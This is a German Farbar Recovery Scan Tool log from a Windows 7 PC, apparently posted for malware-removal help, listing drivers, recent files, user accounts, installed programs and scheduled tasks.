S3 MozillaMaintenance; "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" [X]
S2 Tender Switch; "C:\Program Files (x86)\Tender Switch\Tender Switch.exe" [X]
S3 TrustedInstaller; %SystemRoot%\servicing\TrustedInstaller.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 AVEO; C:\Windows\System32\DRIVERS\AVEOdcnt.sys [305920 2011-10-24] (AVEO)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2014-01-16] (DT Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [30424 2014-10-22] (Sony Mobile Communications)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-10-05] (Malwarebytes Corporation)
S3 smhwser; C:\Windows\System32\DRIVERS\smhwser.sys [122624 2010-02-04] (QUALCOMM Incorporated)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2014-07-28] (Apple, Inc.) [Datei ist nicht signiert]
S3 USBTINSP; C:\Windows\System32\DRIVERS\tinspusb.sys [142848 2010-03-29] (Texas Instruments)
S1 BdfNdisf; \??\c:\program files\common files\bitdefender\bitdefender firewall\bdfndisf6.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 X6va034; \??\C:\Windows\SysWOW64\Drivers\X6va034 [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 xspirit; \??\C:\Windows\xspirit.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-12-22 00:29 - 2015-12-22 00:29 - 00235373 _____ C:\ProgramData\1450740415.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 00027576 _____ C:\ProgramData\1450740559.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 00000505 _____ C:\Users\Özkan\Desktop\mbam.txt
2015-12-21 23:26 - 2015-12-22 00:27 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-21 23:26 - 2015-12-22 00:23 - 00001096 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2015-12-21 23:26 - 2015-12-21 23:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2015-12-21 23:25 - 2015-12-21 23:25 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-12-21 23:25 - 2015-12-21 23:25 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2015-12-21 23:25 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-12-21 23:25 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-12-21 23:25 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2015-12-21 23:14 - 2015-12-21 23:18 - 00000000 ____D C:\AdwCleaner
2015-12-21 22:52 - 2015-12-22 01:23 - 00000000 ____D C:\FRST
2015-12-21 20:17 - 2015-09-17 21:24 - 00282000 _____ (BitDefender) C:\Windows\system32\Drivers\avchv.sys
2015-12-21 20:11 - 2015-12-22 00:29 - 00000000 ____D C:\Program Files\Bitdefender Agent
2015-12-21 12:32 - 2015-12-21 23:12 - 00002651 _____ C:\Users\Özkan\Desktop\Neues Textdokument.txt
2015-12-19 22:03 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2015-12-19 09:34 - 2015-12-19 09:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Fraps
2015-12-18 22:14 - 2015-12-18 22:14 - 00001037 _____ C:\Users\Özkan\Documents\R50234.txt
2015-12-18 19:46 - 2015-12-18 19:46 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2015-12-18 19:36 - 2015-12-22 00:36 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-18 19:36 - 2015-12-19 18:49 - 00000000 ____D C:\Users\Özkan\Desktop\Bewerbungen Etc
2015-12-18 19:36 - 2015-12-18 19:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2015-12-17 20:05 - 2015-12-17 20:05 - 00019336 _____ C:\Windows\System32\Tasks\{28325A84-A9DE-5181-98DC-72E8BE19248C}
2015-12-09 20:18 - 2015-12-09 20:18 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2015-12-08 21:35 - 2015-12-22 00:23 - 00001141 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-08 21:34 - 2015-12-08 21:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-12-08 21:33 - 2015-12-08 21:33 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2015-12-08 21:33 - 2015-12-08 21:33 - 00000000 ____D C:\Program Files\Common Files\AV
2015-12-08 21:30 - 2015-12-09 15:05 - 00000000 ____D C:\ProgramData\AVAST Software
2015-12-08 21:09 - 2015-12-22 01:20 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-08 21:09 - 2015-12-22 00:32 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-08 21:09 - 2015-12-08 21:15 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-08 21:09 - 2015-12-08 21:15 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-08 13:43 - 2015-12-08 13:43 - 00000000 ____D C:\ProgramData\{30aa3bf1-20c8-0}
2015-12-08 13:43 - 2015-12-08 13:43 - 00000000 ____D C:\ProgramData\{029b1f57-60c8-1}
2015-12-04 21:54 - 2015-12-07 15:23 - 00000000 ____D C:\Users\Özkan\Documents\AnotherLife-Keybinder
2015-12-04 17:45 - 2015-12-04 17:47 - 00000000 ____D C:\Program Files\Microsoft Office
2015-11-25 21:06 - 2015-11-25 21:06 - 00000000 ____D C:\Users\Özkan\Documents\Razer

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-12-22 00:38 - 2013-07-29 20:28 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-12-22 00:37 - 2009-07-14 05:45 - 00020480 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-22 00:37 - 2009-07-14 05:45 - 00020480 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-22 00:33 - 2014-01-16 14:09 - 00000000 ____D C:\Users\Özkan\AppData\Local\ElevatedDiagnostics
2015-12-22 00:33 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2015-12-22 00:28 - 2014-01-20 19:03 - 00000000 ____D C:\ProgramData\Bitdefender
2015-12-22 00:28 - 2014-01-20 19:02 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
2015-12-22 00:27 - 2014-11-09 22:57 - 00145397 _____ C:\bdlog.txt
2015-12-22 00:27 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-22 00:23 - 2015-10-06 17:25 - 00001147 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-22 00:23 - 2015-10-01 18:36 - 00001209 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2015-12-22 00:23 - 2015-05-23 17:29 - 00001031 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 10.lnk
2015-12-22 00:23 - 2014-07-17 14:36 - 00001293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
2015-12-22 00:23 - 2014-07-17 14:35 - 00001362 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk
2015-12-22 00:23 - 2014-01-19 16:21 - 00000924 _____ C:\Users\Public\Desktop\EPSON Scan.lnk
2015-12-22 00:23 - 2013-07-29 20:05 - 00000860 _____ C:\Users\Public\Desktop\CCleaner.lnk
2015-12-22 00:23 - 2013-07-29 19:23 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2015-12-22 00:23 - 2013-07-29 19:23 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001292 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
2015-12-22 00:23 - 2009-07-14 05:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
2015-12-22 00:22 - 2014-11-09 22:33 - 00002073 _____ C:\ProgramData\Microsoft\Windows\Start Menu\GetDataBack for NTFS.lnk
2015-12-22 00:22 - 2014-02-16 20:27 - 00001421 _____ C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-12-22 00:22 - 2013-12-23 19:37 - 00000436 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2015-12-22 00:22 - 2013-11-24 20:17 - 00000355 _____ C:\Users\Özkan\Desktop\Computer.lnk
2015-12-22 00:22 - 2009-07-14 06:01 - 00001218 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
2015-12-22 00:22 - 2009-07-14 05:49 - 00001246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
2015-12-22 00:21 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-22 00:14 - 2013-08-11 13:13 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2015-12-21 23:18 - 2013-07-29 19:30 - 00000000 ____D C:\Users\Özkan
2015-12-21 23:18 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-21 23:09 - 2014-09-30 16:38 - 01068032 ___SH C:\Users\Özkan\Desktop\Thumbs.db
2015-12-21 20:14 - 2015-08-25 07:55 - 00000000 ____D C:\Program Files\Bitdefender
2015-12-21 13:59 - 2015-06-06 05:04 - 00000000 ____D C:\Users\Özkan\AppData\Local\CrashDumps
2015-12-19 21:10 - 2014-08-18 15:45 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\.minecraft
2015-12-19 09:34 - 2015-10-05 22:17 - 00000000 ____D C:\Fraps
2015-12-19 08:12 - 2014-03-27 18:54 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2015-12-18 19:46 - 2015-06-15 13:20 - 00000000 ____D C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client
2015-12-18 19:14 - 2014-04-26 15:58 - 00000000 ____D C:\ProgramData\Origin
2015-12-18 19:13 - 2015-08-15 06:58 - 00000000 ____D C:\Program Files (x86)\Warlord II
2015-12-15 13:59 - 2009-07-14 06:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-12-13 13:02 - 2015-10-08 12:54 - 00000000 ____D C:\Users\Ã–zkan\AppData\Local\Steam
2015-12-10 17:16 - 2014-02-18 15:55 - 00000000 ____D C:\temp
2015-12-10 16:26 - 2015-08-15 06:31 - 00000000 ____D C:\Program Files (x86)\SmoothScroll
2015-12-10 16:23 - 2009-07-14 18:58 - 00704504 _____ C:\Windows\system32\perfh007.dat
2015-12-10 16:23 - 2009-07-14 18:58 - 00152310 _____ C:\Windows\system32\perfc007.dat
2015-12-10 16:23 - 2009-07-14 06:13 - 01634288 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-09 16:38 - 2013-07-29 20:28 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-09 16:38 - 2013-07-29 20:28 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-09 16:38 - 2013-07-29 20:28 - 00003822 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-12-09 13:53 - 2015-08-25 18:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-08 21:25 - 2015-11-15 16:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mirillis
2015-12-08 21:25 - 2015-11-15 16:49 - 00000000 ____D C:\Program Files (x86)\Mirillis
2015-12-08 21:25 - 2015-10-03 08:31 - 00000000 ____D C:\Program Files (x86)\AnotherLifeClient
2015-12-08 20:57 - 2009-07-14 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-11-25 23:53 - 2015-09-16 16:42 - 00000000 ____D C:\Program Files (x86)\Razer
2015-11-25 21:50 - 2014-08-23 22:55 - 00035328 ___SH C:\Users\Özkan\Thumbs.db
2015-11-25 21:47 - 2014-01-26 13:08 - 00000000 ____D C:\Users\Özkan\AppData\Local\Razer
2015-11-25 21:47 - 2014-01-26 13:07 - 00000000 ____D C:\ProgramData\Razer
2015-11-25 21:09 - 2014-01-30 20:07 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\TeamViewer
2015-11-25 20:08 - 2015-09-08 11:49 - 00000000 ____D C:\Users\Özkan\Documents\Files

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2013-12-11 15:57 - 2013-12-11 15:57 - 2791563 _____ () C:\Program Files\oodr.chm
2013-12-11 18:58 - 2013-12-11 18:58 - 1755432 _____ (O&O Software GmbH) C:\Program Files\oodrrs.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 3407656 _____ (O&O Software GmbH) C:\Program Files\oodrsurs.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 6164264 _____ (O&O Software GmbH) C:\Program Files\oodskrec.exe
2013-10-09 14:22 - 2013-10-09 14:22 - 1016624 _____ (O&O Software GmbH) C:\Program Files\ooliveupdate.exe
2013-12-10 15:46 - 2013-12-10 15:46 - 6562600 _____ (O&O Software GmbH) C:\Program Files\oorwiz3.dll
2013-12-10 15:46 - 2013-12-10 15:46 - 0164136 _____ (O&O Software GmbH) C:\Program Files\oorwiz3r.dll
2013-12-10 15:46 - 2013-12-10 15:46 - 4554536 _____ (O&O Software GmbH) C:\Program Files\oosu.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 4900648 _____ (O&O Software GmbH) C:\Program Files\ooviewer.dll
2013-12-11 16:06 - 2013-12-11 16:06 - 0001755 _____ () C:\Program Files\readme.txt
2015-11-07 17:58 - 2015-11-07 18:02 - 6420480 _____ () C:\Program Files (x86)\GUT87EA.tmp
2015-06-24 19:34 - 2015-06-26 22:40 - 0000079 _____ () C:\Program Files (x86)\prefs.js
2015-07-22 12:45 - 2015-08-14 14:53 - 0000020 _____ () C:\Users\Özkan\AppData\Roaming\appdataFr2.bin
2015-08-15 06:29 - 2015-08-25 07:48 - 0000024 _____ () C:\Users\Özkan\AppData\Roaming\appdataFr25.bin
2014-07-08 18:34 - 2014-07-08 18:34 - 0000000 ___SH () C:\Users\Özkan\AppData\Local\LumaEmu
2015-06-27 12:06 - 2015-06-27 12:06 - 0000000 _____ () C:\Users\Özkan\AppData\Local\Temp.dat
2015-12-22 00:29 - 2015-12-22 00:29 - 0235373 _____ () C:\ProgramData\1450740415.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 0027576 _____ () C:\ProgramData\1450740559.bdinstall.bin
2015-08-14 20:57 - 2015-08-14 20:57 - 0000006 __RSH () C:\ProgramData\37d3abf93dbe04b7eb83987cae627f61c2b48eeb

Einige Dateien in TEMP:
====================
C:\Users\Özkan\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2015-12-19 19:57

==================== Ende von FRST.txt ============================

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:20-12-2015
durchgeführt von Özkan (2015-12-22 01:24:13)
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2013-07-29 18:30:24)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1539430812-113463742-2149372525-500 - Administrator - Disabled)
Gast (S-1-5-21-1539430812-113463742-2149372525-501 - Limited - Disabled) => C:\Users\Gast.EasyNote
HomeGroupUser$ (S-1-5-21-1539430812-113463742-2149372525-1010 - Limited - Enabled)
Özkan (S-1-5-21-1539430812-113463742-2149372525-1000 - Administrator - Enabled) => C:\Users\Özkan

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.228 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.3.133 - Adobe Systems, Inc.)
Broadcom Card Reader Driver Installer (HKLM\...\{4710662C-8204-4334-A977-B1AC9E547819}) (Version: 15.0.7.3 - Broadcom Corporation)
Broadcom NetLink Controller (HKLM\...\{C91DCB72-F5BB-410D-A91A-314F5D1B4284}) (Version: 15.0.7.1 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 4.04 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Druckerdeinstallation für EPSON WF-2540 Series (HKLM\...\EPSON WF-2540 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
ETDWare PS/2-X64 10.6.9.9_WHQL (HKLM\...\Elantech) (Version: 10.6.9.9 - ELAN Microelectronic Corp.)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Fraps (HKLM-x32\...\Fraps) (Version:  - )
GetDataBack for NTFS (HKLM-x32\...\{56582EEA-3AEF-4D84-8B9D-C87A3CD9250F}) (Version: 4.32.000 - Runtime Software)
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.2.1410 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2712 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{09536BA1-E498-4CC3-B834-D884A67D7E34}) (Version: 1.23.605.1 - Intel Corporation)
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.670 - Oracle)
Launch Manager (HKLM-x32\...\LManager) (Version: 5.1.15 - Packard Bell)
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{929CE49F-1CA7-4CF3-A9A1-6D757443C63F}) (Version: 1.2.0241 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft-Maus- und Tastatur-Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 42.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 42.0 (x86 de)) (Version: 42.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 42.0 - Mozilla)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 3.0 - Qualcomm Atheros)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6543 - Realtek Semiconductor Corp.)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.14.14.201410081526 - Sony Mobile Communications AB)
Sony PC Companion 2.10.228 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.228 - Sony)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.42849 - TeamViewer)
Unity Web Player (HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\UnityWebPlayer) (Version: 5.0.3f2 - Unity Technologies ApS)
Unlocker 1.9.1-x64 (HKLM\...\Unlocker) (Version: 1.9.1 - Cedrick Collomb)
VLC media player 2.0.7 (HKLM\...\VLC media player) (Version: 2.0.7 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 4.20 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1539430812-113463742-2149372525-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll => Keine Datei

==================== Wiederherstellungspunkte =========================

13-12-2015 19:00:24 Windows-Sicherung
19-12-2015 22:02:37 DirectX wurde installiert
20-12-2015 20:38:23 Windows-Sicherung

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2015-12-22 00:21 - 00000870 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {2F9EFD6F-C190-4C5F-91E4-8DC29081871B} - System32\Tasks\{1E300C01-90FD-450F-BD1E-62BCCA98B390} => Firefox.exe hxxp://ui.skype.com/ui/0/7.0.0.102/de/abandoninstall?source=lightinstaller&amp;page=tsBing
